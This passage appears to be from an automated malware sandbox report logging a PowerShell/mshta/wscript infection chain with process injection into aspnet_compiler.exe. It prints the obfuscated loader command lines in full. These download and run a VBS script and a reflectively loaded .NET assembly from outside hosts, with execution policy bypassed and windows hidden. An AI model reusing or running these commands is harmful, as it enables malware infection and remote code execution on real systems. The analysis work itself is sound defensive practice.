                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00402B7C GetProcessHeap,RtlAllocateHeap,11_2_00402B7C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi32_5536.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5536, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: E51008Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNTJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCA7.tmp" "c:\Users\user\AppData\Local\Temp\glmzcldr\CSCA9586F3AA915453C854280BCC33938CA.TMP"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jhc4mm1rrcagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhreqtvhlwrsagicagicagicagicagicagicagicagicagicagicagic1tzw1irvjkruzjtmluaw9oicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1pti5kbgwilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbjdcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbhz2j5dvjqre9ulhn0cmluzyagicagicagicagicagicagicagicagicagicagicagihn6s3pylhvpbnqgicagicagicagicagicagicagicagicagicagicagicbwvvissw50uhryicagicagicagicagicagicagicagicagicagicagicaguhpyktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbuugicagicagicagicagicagicagicagicagicagicagicaidudvv29miiagicagicagicagicagicagicagicagicagicagicagic1oqu1lc3bby2ugicagicagicagicagicagicagicagicagicagicagicb5uw9oc3zvwvfmicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicr3odjtuuq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzmyl3nlzw15ymvzdhroaw5nc3dpdghlbnrpcmvsawzldgltzxroaw5nc3rvzg9tewjlc3qudelgiiwijgvodjpbufbeqvrbxhnlzw15ymvzdhroaw5nc3dpdghlbnrpcmvsawzldgltzxroaw5nc3rvzg9tewiudmjtiiwwldapo1nuyxjulxnmzuvqkdmpo2llecagicagicagicagicagicagicagicagicagicagicagicikru5wokfquerbvefcc2vlbxlizxn0dghpbmdzd2l0agvudglyzwxpzmv0aw1ldghpbmdzdg9kb215yi52ylmi'+[char]34+'))')))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhzfckjpu2vqukvmrvjlbknlllrpc3ryaw5nkclbmswzxssnecctsm9jbicnksaokcdwd2dpbwfnzvvybccrjyankyc9ig9uqwh0dhbzoi8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3rhcm5ujysnsunmrmhtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9zmq0zjyxngjijysnmja5yzyyyze3mza5nduxnzzhmdkwngygb1rboycrj3b3z3dlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7chdnaw1hz2vcexrlcya9ihb3z3dlyknsawvudc5eb3dubccrj29hzerhdgeochdnaw1hz2vvcmwpo3b3z2ltywdlvgv4dca9ifttexn0zw0uvccrj2v4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkhb3z2ltywdlqnl0zxmpo3b3z3n0yxj0rmxhzya9ig9uqtw8qkftrty0xycrj1nuqvjupj5vvee7chdnzw5krmxhzya9ig9uqtw8qkftrty0x0vord4+b1rbo3b3z3n0yxj0sw5kzxggpsbwd2dpbwfnzvrlehqusw5kzxhpzihwd2dzdgfydezsywcpo3b3z2vuzeluzgv4id0gchdnaw1hz2vuzxh0lkluzgv4jysnt2yochdnzw5krmxhzyk7chdnjysnc3rhcnrjbmrlecatz2ugmcatyw5kihb3z2vuzeluzgv4ic1ndcbwd2dzdgfydeluzgv4o3b3z3n0yxj0sw5kzxggkz0gchdnc3rhcnrgbgfnlkxlbmd0adtwd2diyxnlnjrmzw5ndgggpsbwd2dlbmrjbmrlecatihb3z3n0yxj0sw5kzxg7chdnymfzzty0q29tbwfuzccrjya9ihb3z2ltywdlvgv4dc5tdwjzdhjpbmcochdnc3rhcnrjbmrlecwgchdnymfzzty0tgvuz3rokttwd2diyxnlnjrszxzlcnnlzca9ic1qb2luichwd2diyxnlnjrdb21tyw5kllrvjysnq2hhckfycmf5kckgng91iezvckvhy2gtt2jqzwn0ihsgchdnxyb9kvstms4ulshwd2diyxnlnjrdb21tyw5klkxlbmd0acldo3b3z2nvbscrj21hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcochdnymfzzty0umv2zxjzzwqpo3b3z2xvywrlzefzc2vtymwnkyd5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchwd2djb21tyw5kqnl0zxmpo3b3z3zhau1ldghvzca9iftkbicrj2xpyi5jty5ib21lxs5hjysnzxrnzxrob2qob1rbvkfjb1rbkttwd2d2ywknkydnzxrob2qusw52b2tlkhb3jysnz251bgwsieaob1rbdhh0llnmtfbnuy8ymy82mzeumzqyljmumjkxly86chr0ag9uqswgb1rbzgvzyxrpdmfkb29uqswnkycgb1rbzgvzjysnyxrpdmfkb29uqswgb1rbzgvzyxqnkydpdmfkb29uqswgb1rbyxnwbmv0x2nvbxbpbgvyb1rblcbvvefkjysnzxnhdgl2ywrvb1rblcbvvefkzxnhdgl2ywrvb1rblg9uqwrlc2f0axzhzg9vveesb1rbzgvzyxrpdmfkjysnb29uqsxvvefkzscrj3nhdgl2ywrvb1rblg9uqwrlc2f0axzhzg9vveesb1rbzgvzyxrpjysndmfkb29uqsxvvccrj0exb1rblg9ujysnqwrlc2f0axzhzg9vveepktsnks5szxbmqwnlkcdwd2cnlfttvhjjbmddw0noqxjdmzyplljlcexby2uokftdaefyxtexmstbq2hbcl04nctbq2hbcl02nsksw1nuckluz11bq2hbcl0zoskuumvwtefjzsgow0noqxjdntirw0noqxjdmtexk1tdaefyxtexnyksj3wnksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $verbosepreference.tostring()[1,3]+'x'-join'') (('pwgimageurl'+' '+'= otahttps://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnt'+'icffhmtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f ota;'+'pwgwebclient = new-object system.net.webclient;pwgimagebytes = pwgwebclient.downl'+'oaddata(pwgimageurl);pwgimagetext = [system.t'+'ext.encoding]::utf8.getstring(pwgimagebytes);pwgstartflag = ota<<base64_'+'start>>ota;pwgendflag = ota<<base64_end>>ota;pwgstartindex = pwgimagetext.indexof(pwgstartflag);pwgendindex = pwgimagetext.index'+'of(pwgendflag);pwg'+'startindex -ge 0 -and pwgendindex -gt pwgstartindex;pwgstartindex += pwgstartflag.length;pwgbase64length = pwgendindex - pwgstartindex;pwgbase64command'+' = pwgimagetext.substring(pwgstartindex, pwgbase64length);pwgbase64reversed = -join (pwgbase64command.to'+'chararray() 4ou foreach-object { pwg_ })[-1..-(pwgbase64command.length)];pwgcom'+'mandbytes = [system.convert]::frombase64string(pwgbase64reversed);pwgloadedassembl'+'y = [system.reflection.assembly]::load(pwgcommandbytes);pwgvaimethod = [dn'+'lib.io.home].g'+'etmethod(otavaiota);pwgvai'+'method.invoke(pw'+'gnull, @(otatxt.sllpms/23/631.342.3.291//:ptthota, otadesativadoota,'+' otades'+'ativadoota, otadesat'+'ivadoota, otaaspnet_compilerota, otad'+'esativadoota, otadesativadoota,otadesativadoota,otadesativad'+'oota,otade'+'sativadoota,otadesativadoota,otadesati'+'vadoota,ot'+'a1ota,ot'+'adesativadoota));').replace('pwg',[string][char]36).replace(([char]111+[char]84+[char]65),[string][char]39).replace(([char]52+[char]111+[char]117),'|'))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jhc4mm1rrcagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhreqtvhlwrsagicagicagicagicagicagicagicagicagicagicagic1tzw1irvjkruzjtmluaw9oicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1pti5kbgwilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbjdcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbhz2j5dvjqre9ulhn0cmluzyagicagicagicagicagicagicagicagicagicagicagihn6s3pylhvpbnqgicagicagicagicagicagicagicagicagicagicagicbwvvissw50uhryicagicagicagicagicagicagicagicagicagicagicaguhpyktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbuugicagicagicagicagicagicagicagicagicagicagicaidudvv29miiagicagicagicagicagicagicagicagicagicagicagic1oqu1lc3bby2ugicagicagicagicagicagicagicagicagicagicagicb5uw9oc3zvwvfmicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicr3odjtuuq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzmyl3nlzw15ymvzdhroaw5nc3dpdghlbnrpcmvsawzldgltzxroaw5nc3rvzg9tewjlc3qudelgiiwijgvodjpbufbeqvrbxhnlzw15ymvzdhroaw5nc3dpdghlbnrpcmvsawzldgltzxroaw5nc3rvzg9tewiudmjtiiwwldapo1nuyxjulxnmzuvqkdmpo2llecagicagicagicagicagicagicagicagicagicagicagicikru5wokfquerbvefcc2vlbxlizxn0dghpbmdzd2l0agvudglyzwxpzmv0aw1ldghpbmdzdg9kb215yi52ylmi'+[char]34+'))')))"Jump to behavior
